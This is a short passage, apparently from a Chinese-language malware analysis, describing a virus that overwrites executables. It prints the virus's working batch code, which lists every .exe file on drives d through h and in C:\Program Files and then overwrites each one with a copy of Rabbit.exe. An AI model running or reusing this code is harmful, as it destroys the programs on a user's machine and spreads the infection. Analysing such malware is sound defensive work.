7、该病毒会替换c盘program files和d,e,f,g盘中的exe文件
---------------------------------------------------------------------
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>%SystemRoot%\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>%SystemRoot%\msconfig1.inf
FOR /f "delims=" %%i in (%SystemRoot%\msconfig.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (%SystemRoot%\msconfig1.inf) do copy /y "%SystemRoot%\system32\Rabbit.exe" "%%i"
-------------------------------------------------------------------------